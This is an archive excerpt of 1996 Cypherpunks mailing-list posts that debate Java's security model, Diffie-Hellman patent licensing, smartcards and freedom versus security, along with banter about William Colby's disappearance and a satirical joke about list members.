properly. What, exactly, is the "Security" that you are offering us?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 1 May 1996 12:46:49 +0800
To: cypherpunks@toad.com
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
Message-ID: <adabb253070210048971@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:38 PM 4/30/96, Perry E. Metzger wrote:
>Timothy C. May writes:
>> SCRUFFIES AND NEATS IN SECURITY
>>
>> The "security neat" believes in applying rigor to security. Machines and
>> languages should be "provably secure." (Better yet, machines should be
>> "provably correct," a la Viper, and operating systems and languages should
>> produce provably correct code.)
>
>Don't take this the wrong way, Tim, but you have totally
>misinterpreted the position many of us who dislike Java take. You
>completely mischaracterize our attitude.


Perry, that essay was, as I said, sent out before it was finished. I did
not even get to the part I was planning about classifying the Java
supporters/detractors as either scruffies or neats!

Now, while you may have _anticipated_ the point I was going to make in the
completed essay, you cannot say I have "mischaracterized" anyone's attitude
at this point!

Unless you have a source of thiotimoline I'm not aware of.

--Tim


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 1 May 1996 12:03:35 +0800
To: perry@piermont.com
Subject: Re: The Joy of Java
In-Reply-To: <199604292245.SAA10827@jekyll.piermont.com>
Message-ID: <199604301749.NAA11738@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" writes:
>Scott Brickner writes:
>> I don't understand what you mean by "insufficiently powerful".  It's as
>> expressively powerful as most high-level languages, and computationally
>> Turing equivalent.  It's lack of power seems entirely in the performance
>> arena, which may be solved, eventually.
>
>Java applications can't save files to disk or use data files on
>disk. If you were, for instance, buying two CPU weeks of idle time on
>some machines, you would need stuff like checkpointing or the ability
>to save intermediate results.

It is false that Java applications "can't" save files to disk.  Java
has no I/O facilities, exactly like C and C++ have none.  Any I/O
capability must be provided in external functions.  The applet
environment doesn't include file I/O functions, but it can be easily
added in a reasonably safe way (filesystem object only allocates a fixed
region of real disk space, applets are charged to use it, after the
"rent" is gone, the blocks are freed, etc.)

Java applications may also send checkpoint data or intermediate results
back "home", even in the current environment.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 1 May 1996 12:32:22 +0800
To: cypherpunks@toad.com
Subject: Re: Former CIA Director and *Strategic Investment* Editor
Message-ID: <adabb34c08021004c3f4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:11 PM 4/30/96, jim bell wrote:

>I'd like to hear more about the timeline.  From a snippet I heard yesterday,
>he telephoned his wife and said he'd be renting a canoe.  Okay, who and why
>did "they" visit a cabin (?) to find him? (If somebody called me from a
>cabin, and he had a telephone, I would not consider his failure to later
>answer the phone to be particularly suspicious...)

Then read the damned newspapers or watch the damned news broadcasts or read
the damned Web news accounts, rather than mentioning that you've seen
"snippets" but that you have other Unanswered Questions which They are Not
Answering.

Looking for conspiracies in the almost certainly accidental drowning of
Colby is an even bigger waste of time than spending vast efforts trying to
show that Vince Foster was killed by the O.T.O.

Jeesh.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 1 May 1996 13:42:56 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: no-cost DH?
In-Reply-To: <199604300808.BAA17923@netcom9.netcom.com>
Message-ID: <Pine.SUN.3.93.960430130125.8652A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Apr 1996, Bill Frantz wrote:

> Morris (Cylink): Cylink owns the DH patents.  We are opening the
> technology with no-cost licenses.  Patents should not be used to block
> the technology. 

Does anyone know more about these no-cost licenses?  I wouldn't mind
getting free DH a year early...

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 1 May 1996 13:59:01 +0800
To: cypherpunks@toad.com
Subject: SF area: Bernstein victory beach volleyball party, this Sunday
Message-ID: <199604302019.NAA11079@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Remember how much fun it was to get all dressed up in banker's clothes
to go to the Bernstein court hearing and show the judge that we cared?
Well, now it's time to get UNdressed and come to the beach to
celebrate the results!  See you there!			-- John

From: Joseph Arceneaux <jla@arceneaux.com>
To: vball@arceneaux.com
Subject: Bernstein victory beach volleyball party, take 2

Let's try again to celebrate the Berstein victory at the beach.   

Hopefully, the weather will be better this Sunday.  Last weekend was
beautiful and we saw several whales just offshore.

WHEN:  Sunday, May 5, from 1:00 on, weather permitting.  
WHERE:  Grey Whale Cove, off Highway 1 south of Pacifica but before Montara.
                To check for weather conditions, call (415) 728-5336
   
NOTICE: This is a clothing-optional beach and costs $5 per person.
It's well worth it, however. No one is under any obligation to take
their clothes off, or to leave them on, for that matter.
          
>From SF: take 280 to Hwy 1 South, through Pacifica.  After the road
rises to the cliff level, look for the abandoned bunker on the cliff
to your right.  Just after it, watch for the parking lot on your left.
Park and walk down.

>From the South Bay: take 92 across to the ocean.  Turn north (right)
on Hwy 1.  After Montara, the road rises into the cliffs.  Watch for
the only parking lot on the right-hand side of the road.  Park and
walk down.

Hope to see you there.  Please invite others.  The more, the merrier.

Joe & Cindy

PS:  The first person to spot a naked NSA guy wins a prize.

----
Joseph Arceneaux
Arceneaux Consulting

http://www.arceneaux.com
jla@arceneaux.com
+1 415 648 9988 (direct)
+1 415 341 1395 (fax)
+1 500 488 9308

Cindy A. Cohn                                                               
McGlashan & Sarrail, P. C.
177 Bovet Road, 6th Floor                                            
San Mateo, CA  94402
(415) 341-2585 (tel)
(415)341-1395 (fax)
Cindy@McGlashan.com
http://www.McGlashan.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 1 May 1996 10:44:47 +0800
To: Michael Froomkin <btmoore@iquest.net>
Subject: Re: Smartcards are coming to the US
In-Reply-To: <m0uDzVt-0048voC@iquest.net>
Message-ID: <v03006607adabfc90e2ad@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:06 AM  -0400 4/30/96, Michael Froomkin wrote:

> Lack of entrenched competitors? E.g. credit cards?

Proof that cash is cheaper than credit? Certificates cheaper than
book-entries? ;-).

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 May 1996 11:03:03 +0800
To: cypherpunks@toad.com
Subject: once again
Message-ID: <199604301802.OAA14241@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Lots of people seem to have misread my statement about java programs
and I/O.

To repeat:

I fully understand that Java is a general programming language and can
do I/O. However, "Safe" Java subsets, like the ones used for writing
applets or presumably the ones that would be needed for markets in CPU
cycles, do not do i/o. One could add i/o to the suite, but that would
be dangerous.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 1 May 1996 13:59:49 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Former CIA Director and *Strategic Investment* Editor
Message-ID: <m0uEN3x-00091PC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:46 PM 4/30/96 -0400, Black Unicorn wrote:
>
>> Aren't you making an assumption that Colby is dead?  No body has been found, 
>> last I heard.   Maybe he just decided that he wanted to disappear in a 
>> comparatively non-suspicious fashion?
>
>Having met Colby and being somewhat familiar with his political skills I
>would be surprised if he would ever think a drowning accident was
>"non-suspicious."

Notice that I said "comparatively" non-suspicious.  Can you think of any 
LESS suspicious way to appear to die and still explain no body being found?

>
>William Colby, whatever anyone may think of intelligence,

I think their mis-usage of the word "intelligence" is hilariously presumptuous.

> was quite a man,
>respected in the community, a major in the OSS and a World War II hero
>decorated 5 times.  His like are not common.
>
>I hope he is found alive and well.

He might very well be alive.  But it's almost certain he won't be found...

BTW, the news item I read this morning stated that his neighbors called the 
cops when they noticed that his car was still at the cabin Sunday 
night...after the time he normally left to return home.  While most people 
wouldn't see a problem with this, I do:  How many citizens are so aware of 
the schedules and habits of their neighbors that they would become 
suspicious if their neighbor stayed TOO LONG?  Not days and days too long, 
just a few hours?  Or were Colby's habits so precise and predictable (and 
known to be so!) that his neighbor would call the cops just because he, 
ONCE, stayed a little longer than normal?

What's wrong with this picture?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 May 1996 12:34:10 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <adab8d3e04021004d25b@[205.199.118.202]>
Message-ID: <199604301838.OAA14274@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> SCRUFFIES AND NEATS IN SECURITY
> 
> The "security neat" believes in applying rigor to security. Machines and
> languages should be "provably secure." (Better yet, machines should be
> "provably correct," a la Viper, and operating systems and languages should
> produce provably correct code.)

Don't take this the wrong way, Tim, but you have totally
misinterpreted the position many of us who dislike Java take. You
completely mischaracterize our attitude.

There are two philosophies in opposition here, the optimistic
model versus the realistic model.

1) "We are smart, so we simply build something that feels good and
   provided we can't find a way to break it we declare it secure."
   This is the Java model. Java isn't "scruffy". Its a very elegant
   and cleanly built system, far more elegant than most. I contend
   that it is flawed, but not because it is "scruffy". I contend that
   the flaw is that its security depends on all its parts working
   flawlessly, and that we can't build flawless systems. Such systems
   are made on the liberal assumption that humans can design something
   perfect in all its parts. To trust a system built on such an
   assumption, you ultimately need a proof of its security from top to
   bottom. The very reason I think such a system is impractical is
   that I agree with the notion that such proofs are not possible or
   if they are made are often as buggy as the code was, proofs merely
   being a formalism in a different language. This is the wrong
   paradigm, from the start.

2) "We are ignorant, so we build something that does as little as we
   can get away with, makes the assumption at every stage that every
   component of the system might be broken, and put seventeen layers
   of armor around it on the assumption that we still have probably
   made a mistake or two in designing the system." This is the model
   that modern firewalls built by the likes of me take -- systems that
   are designed to be tolerant of multiple engineering failures. Such
   systems are built on the assumption that humans are fallible. Such
   systems, unlike Java, do not depend on flawless operation of all
   their components for their security. Such systems are built on the
   conservative assumption that humans are going to make mistakes and
   that you have to take account of your own fallibility when
   designing secure systems. In such a system, one can have breeches
   of the security of four major subsystems and the fifth still keeps
   you alive. The "belt and suspenders" model doesn't require
   mathematical proofs of security because it was engineered, from the
   start, to be robust.

Tim misunderstands, thinking this is a case of some foolish
perfectionists getting mad at the guys who throw things together and
hope that they work. Not at all. Our problem with Java is the security
model, which inherently requires perfect design and operation. We
build our own systems to be robust enough to survive our own mistakes.
Java is built such that any mistake is fatal.

Essentially, this is the optimists versus the realists.

Perry

PS BTW, Tim, Java is great for the theorem prover fetishizers -- look no
further than Java's bytecode verifier. I have never built a system
that required an "active defense" like that. They fill me with the
same sort of dread I would get from a skyscraper design that required
a constant flow of electricity to the building lest it collapse. Sure,
its cool. Maybe it even saves some money. However, can you sleep at
night inside it?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 1 May 1996 13:37:33 +0800
To: frantz@netcom.com
Subject: Re: [LONG] Churchill Club: 20th Anniversary PK Crypto
Message-ID: <m0uENB7-0008yqC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:01 AM 4/30/96 -0700, Mark S. Miller wrote:
>   Paul Raines, Project Manager, United States Postal Service described
>   ...  The post office brings four things that private
>   industry can't: ... (2) ... well established reputation, ...
>   (4) it can act as a trusted third party.
>
>Oh.  Well that's good to know.
>
>	--MarkM

I agree that the Post Office has a "well-established reputation."  Too bad 
it isn't a GOOD "well-established reputation."


Jim Bell
jimbell@pacifier.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 1 May 1996 08:44:04 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: [Joke] It Takes a Village
Message-ID: <199604301538.IAA16842@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


** Reply to note from cpunk@remail.ecafe.org 04/30/96 10:49am +0100

	well, might as well flesh it out and get the rest of us who 
    were slighted --and don't forget yourself.

	if you can not laugh at yourself occasionally, check your pulse


= Friend,
= 
= Here's Timothy May, the self-appointed village headman.
= He's surrounded by a bunch of arse-kissing accolytes:
= -"Gosh, I thought that Java was garbage, but now that Tim mentions  
it,
= it's the best thing in the world"
= -"Tim's right, Java is terrific."
= 
= Village Jester: "Tim's dead wrong.  Java isn't good--it's great!" 
= 
= Then there's Perry Metzger, the local squire, who's embittered over  
the
= fact that, while he's got some worthwhile things to say, he's always
= overpowered by the "charisma" and new clothes of May.
= 
= Jim Bell, village idiot.  He's always good sport for the village  
bully,
= Black Unicorn.  His pretentions aside ("the black unicorn has been in
= my family crest for a thousand years"), he is in actuality a short,
= portly Philadelphia accountant by the name of Irving Lipshitz-Groins.
= 
= Cordially,
= 
= Your village historian


--
Overseeing first-rate programmers is a managerial challenge 
  roughly comparable to herding cats.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@gti.net>
Date: Wed, 1 May 1996 12:42:29 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: LolitaWatch v1.1
In-Reply-To: <2.2.32.19960430141123.0071edcc@popserver.panix.com>
Message-ID: <199604301950.PAA05651@apollo.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be Duncan Frissell wrote:
: 
: At 08:02 PM 4/17/96 -0700, Dave Del Torto wrote:
: >[ Newt Gingrich and his ilk being the mensches they are, I expect v2.0 may  ]
: >[ add support for the "Jew," "Nigger," "Kike," "Fag," "Nerd" and "Wop" bits ]
: >[  -dave                                                                    ]
: >
: 
: Slick Willie and his ilk being the copraphagic cretins they are, I expect
: v2.0 may
: add support for the "religion", African-American, "Person of the Jewish Faith",
: "Lesbian", "Gay man", "Itellectually enhanced but socially challenged", and
: "Euro-American" bits.
: 
: DCF

I hear that a proposal for v1.2b is to AND this bit field with 0xFFFF.  If
the result is 0, the packet is assumed to come from an oppressor and is
dropped.

I am unsure if this will be supported in Livingston's ChoiceNet.

- -- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMYZu8A0HmAyu61cJAQG//wQAvLujj3H+sJi/CsTzE0y1OhbVVx2qq6z9
ocO5huw3/IyeqR/q9QvtClniBeHAr6JFf+pos9fEAPWD076XCkpfymRPY0P2ntFF
Alw2chky9HWhJMH8/6YWHBrbghEL5Pvi4Vldg2Kqc2K0W+w0nYOJ3PG+QBPzVKlc
GuqRjAm3Q7E=
=aqSn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 1 May 1996 14:32:54 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Former CIA Director and *Strategic Investment* Editor
Message-ID: <m0uEOQO-0008yoC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:03 PM 4/30/96 -0400, Black Unicorn wrote:
>On Tue, 30 Apr 1996, jim bell wrote:

>> Notice that I said "comparatively" non-suspicious.  Can you think of any 
>> LESS suspicious way to appear to die and still explain no body being found?
>
>Many.  You lack imagination.

You lack specifics.  And how applicable are these to a person like Colby?


>> He might very well be alive.  But it's almost certain he won't be found...
>
>Your conspiracy nut side is showing.

Who said "conspiracy"?  If Colby wanted to disappear, are you trying to 
suggest that he wouldn't have been able to engineer this himself?  The word 
"conspiracy" requires the actions of more than one person, or have you 
forgotten?  If anything, your misuse of the word "conspiracy" reveals your 
knee-jerk thought processes.


>> Not days and days too long, 
>> just a few hours?  Or were Colby's habits so precise and predictable (and 
>> known to be so!) that his neighbor would call the cops just because he, 
>> ONCE, stayed a little longer than normal?
>
>Yes, they were.  He ran an active consulting business in D.C. and returned
>to the city on a regular schedule.  In addition, he was very prudent about
>letting people know when he was about to go out on the river.  The man was
>in his 70s, of course he generated a good deal of concern amongst his
>neighbors.

If the guy went out, alone, in a canoe in (reportedly) 2-foot waves without 
a life vest, the term "intelligence" is doubly wasted on him.


>> What's wrong with this picture?
>
>It's not hard to see.  As usual you are theorizing and speculating about
>issues and persons you have no connection to.  Even in the face of someone
>with personal experience as to the matter at hand you persist in asserting
>that you are more 'in the know.'

What a brainless statement!  Quite the opposite, I didn't claim to be "in 
the know."  Rather, I merely pointed out that what was being said by others 
about the incident was without appreciable support and rather inconsistent 
and not believeable, and very much inadequate.  I can do this very 
effectively without knowing, for certain, what really did happen.


>In this particular case you are discussing someone I know personally.
>
>Given the circumstances, your rumor mongering is both classless and
>distasteful.

I'm starting no rumors.  Rather, if anything, I'm ATTACKING a rumor being 
portrayed as fact:  The rumor that he died in a canoeing accident.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 1 May 1996 12:59:19 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <adabb253070210048971@[205.199.118.202]>
Message-ID: <199604302018.QAA14545@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> At 6:38 PM 4/30/96, Perry E. Metzger wrote:
> >Timothy C. May writes:
> >> SCRUFFIES AND NEATS IN SECURITY
> >>
> >> The "security neat" believes in applying rigor to security. Machines and
> >> languages should be "provably secure." (Better yet, machines should be
> >> "provably correct," a la Viper, and operating systems and languages should
> >> produce provably correct code.)
> >
> >Don't take this the wrong way, Tim, but you have totally
> >misinterpreted the position many of us who dislike Java take. You
> >completely mischaracterize our attitude.
> 
> Perry, that essay was, as I said, sent out before it was finished.
[...]
> Now, while you may have _anticipated_ the point I was going to make in the
> completed essay, you cannot say I have "mischaracterized" anyone's attitude
> at this point!

I could only respond to the statments you made, not the ones you could
have made.

In any case, I'm not sure that there is such a thing either as a
"Security Scruffy" or a "Security Neat" in the argument about Java;
the breakdown in opinions occurs along very different lines.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 1 May 1996 14:25:16 +0800
To: Simon Spero <btmoore@iquest.net>
Subject: Re: Smartcards are coming to the US
Message-ID: <m0uEOvQ-00091FC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:54 AM 4/30/96 -0700, Simon Spero wrote:
>Much as we Englishmen like to pretend, it is a bit of a reach to describe 
>France as a third-world country...

"The Wogs begin at Dover."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 1 May 1996 13:39:54 +0800
To: m5@vail.tivoli.com
Subject: Re: Freedom and security
Message-ID: <199604302039.QAA26070@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

angels@wavenet.com (CyberAngels Director : Colin Gabriel Hatcher) wrote:

>Mike McNally wrote
>
>>If.... (freedom and security) ....weren't antithetical, there'd be no need
>>for a balance.
>
>If they were antithetical then as freedom increased security would
>decrease, and as security increased freedom would decrease.

There may be some word-definition problems here. I believe Mr.
McNally refers to the words freedom and security as applied to
individuals, and CyberAngels refers to them as applied to the
whole of society. When all the flowery rhetoric is removed,
society is made up of individuals, and individuals almost by
definition disagree on the meanings and relative importance
in their own lives of freedom and security. For example, I
feel not-a-lot of freedom being Vince's munition exporter #17,
but Louis Freeh doubtless feels more secure with a statist law
like ITAR around. FBI Director Freeh and I are both part of
society, and I can refer to the two of us as "we," but "we"
clearly disagree on freedom and security. His side has more
guns, along with the media, and my side has more people who
tell the truth. He is free to open up all his private email
to government snoops if he wants to, but he may not open mine,
because I do not trust him. He also may not dictate the content
of my webpage, which includes my possibly-indecent babypictures.

>It is not IMHO inevitable that if we increase security we will jeopardize
>freedom.  My concern is that if we ignore security we will have no freedom
>left to protect.

I agree. Freedom is already diminishing at an alarming pace.
That is why cypherpunks spread crypto, and why Libertarians like
me rant. Freedom does not increase through more laws. _Parents_,
NOT governments, ISPs, cops, villages, and so on, are responsible
for raising children. Parents sometimes raise kids in ways that I
disagree with, but I am unwilling to advocate laws that prevent
it because such laws only breed more laws, which always lead to
less freedom.

>I don't believe the Internet community is split into two camps on this
>issue - there appear to me to be many places where people draw their lines
>at different points.  

I am unsure what this means. I want Jim Ray drawing my lines,
because I think he does a better job of it than Director Freeh,
even if his side has more/better guns than mine. I feel that his
side is in a different, much better armed, and much more trigger-
happy "camp" than mine.

>I don't believe that security is the enemy of
>freedom.  I believe that freedom needs security in order to exist at all.

Good. Join us in spreading cryptography around, and security will
bloom (along with freedom).
JMR

Regards, Jim Ray <liberty@gate.net> 

"My cynical belief is that there is a lack of motivation in either
 party to fully and properly investigate [Mena] because the results
 will damage as many Republicans as Democrats." - former prosecutor
 Charles Black, in April 22, 1996's Wall Street Journal, p.A22

[NOTE TO MEDIA TYPES LURKING: Must the W$J and "High Times" magazine
 be the only journalists to cover the Mena, Arkansas story???]<sigh>
_______________________________________________________________________
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Public Key id. #  E9BD6D35   --   http://www.shopmiami.com/prs/jimray
_______________________________________________________________________



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMYZ5Rm1lp8bpvW01AQEHCwQAgPyle05vnwDqeWJvWSjFLBm4w6JzZe/F
dxYWsYTLmprySNO45Eu5UMfWiIyN0auW8vndS32Y67/HAgxvPFxfA1J95m//ty/l
qoSDTeeKjuHi4NIMo1gHIVvsWI0cSL/4gJSUJEeI9Ck5xXnWiP1okZAgyLj2HtYS
Wzag+PrHk0M=
=hMTU
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 1 May 1996 13:31:08 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Former CIA Director and *Strategic Investment* Editor
In-Reply-To: <m0uE9Zb-00092YC@pacifier.com>
Message-ID: <Pine.SUN.3.93.960430164418.614B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Apr 1996, jim bell wrote:

> At 07:40 PM 4/29/96 EDT, Dr. Dimitri Vulis wrote:
> >jim bell <jimbell@pacifier.com> writes:
> >> At 04:06 AM 4/29/96 -0700, anonymous-remailer@shell.portal.com wrote:
> >> >CNN is reporting that Colby's canoe has been found on the Potomac and
> >> >Colby is missing.
> >>
> >> Don't tell me, let me guess:  The guy who rented the canoe to him has
> >> suddenly retired, and has been reportedly seen going on a Park Avenue
> >> shopping spree.  Right?
> >
> >Jim, I don't find dumb jokes about dead people I liked particularly funny.
> 
> 
> Aren't you making an assumption that Colby is dead?  No body has been found, 
> last I heard.   Maybe he just decided that he wanted to disappear in a 
> comparatively non-suspicious fashion?

Having met Colby and being somewhat familiar with his political skills I
would be surprised if he would ever think a drowning accident was
"non-suspicious."

William Colby, whatever anyone may think of intelligence, was quite a man,
respected in the community, a major in the OSS and a World War II hero
decorated 5 times.  His like are not common.

I hope he is found alive and well.

> Jim Bell
> jimbell@pacifier.com

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 1 May 1996 14:07:38 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: [Joke] It Takes a Village
In-Reply-To: <199604300949.KAA05650@pangaea.hypereality.co.uk>
Message-ID: <Pine.SUN.3.93.960430164925.614C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 30 Apr 1996, ECafe Anonymous Remailer wrote:

> Friend,

[...]

> Jim Bell, village idiot.  He's always good sport for the village bully,
> Black Unicorn.  His pretentions aside ("the black unicorn has been in
> my family crest for a thousand years"), he is in actuality a short,
> portly Philadelphia accountant by the name of Irving Lipshitz-Groins.

Bullies have to be somewhat superior to intimidate and even Philadelphia
accountants have family crests on occasion.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 1 May 1996 12:59:18 +0800
To: Alan Bostick <abostick@netcom.com>
Subject: Re: [Joke] It Takes a Village
In-Reply-To: <Ugihx8m9LQQW085yn@netcom.com>
Message-ID: <Pine.SUN.3.93.960430165902.614F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 30 Apr 1996, Alan Bostick wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In article <199604300949.KAA05650@pangaea.hypereality.co.uk>,
> cpunk@remail.ecafe.org (ECafe Anonymous Remailer) wrote:
> 
> > Jim Bell, village idiot.  He's always good sport for the village bully,
> > Black Unicorn.  His pretentions aside ("the black unicorn has been in
> > my family crest for a thousand years"), he is in actuality a short,
> > portly Philadelphia accountant by the name of Irving Lipshitz-Groins.
> 
> jim bell is really a short, portly Philadelphia accountant named Irving 
> Lipshitz-Groins?

Nono, that's ME!  ME!  How in bloody hell am I supposed to keep this cover
going if people attribute perfectly good disinformation to Mr. Bell?
(Sigh).

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 1 May 1996 14:51:45 +0800
To: perry@piermont.com
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <199604301838.OAA14274@jekyll.piermont.com>
Message-ID: <199605010015.RAA15723@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



PM:

>2) "We are ignorant, so we build something that does as little as we
>   can get away with, makes the assumption at every stage that every
>   component of the system might be broken, and put seventeen layers
>   of armor around it on the assumption that we still have probably
>   made a mistake or two in designing the system." This is the model
>   that modern firewalls built by the likes of me take -- systems that
>   are designed to be tolerant of multiple engineering failures. Such
>   systems are built on the assumption that humans are fallible. Such
>   systems, unlike Java, do not depend on flawless operation of all
>   their components for their security. Such systems are built on the
>   conservative assumption that humans are going to make mistakes and
>   that you have to take account of your own fallibility when
>   designing secure systems. In such a system, one can have breeches
>   of the security of four major subsystems and the fifth still keeps
>   you alive. The "belt and suspenders" model doesn't require
>   mathematical proofs of security because it was engineered, from the
>   start, to be robust.

well, are you saying it would be impossible to do such a thing in
a distributed programming language? why does Java not fit this 
description? it seems to have the internal equivalent of "firewalls"
(a "sandbox" is a similar concept).

furthermore, you are imposing a virtual military-level degree of
security to something that does not seem to require it. if
a virus gets loose on someone's computer because of Java, what's
the harm? you are designing systems that when broken cost bazillions
of dollars, potentially. what does Java cost when it breaks? who
is saying that one should use Java for extremely mission 
critical situations such as funds transfer?

yes, there are different kinds of security, and it would be 
foolish for anyone to assume or think that the security offered
by Java is the same security referred to by people such as PM
writing financial applications, or people inside the NSA, etc--
you know PM, you often write as if you are an authority on security,
but I'll wager that people inside NSA think you are "playing in
the sandbox" so to speak.

let us agree that no matter how secure something is, there is someone
that demands more security, and actually pays for it. sort of like
no matter how much you make in salary, there is someone who makes
more than you do. or no matter how much you know about subject
[x], someone else knows more.

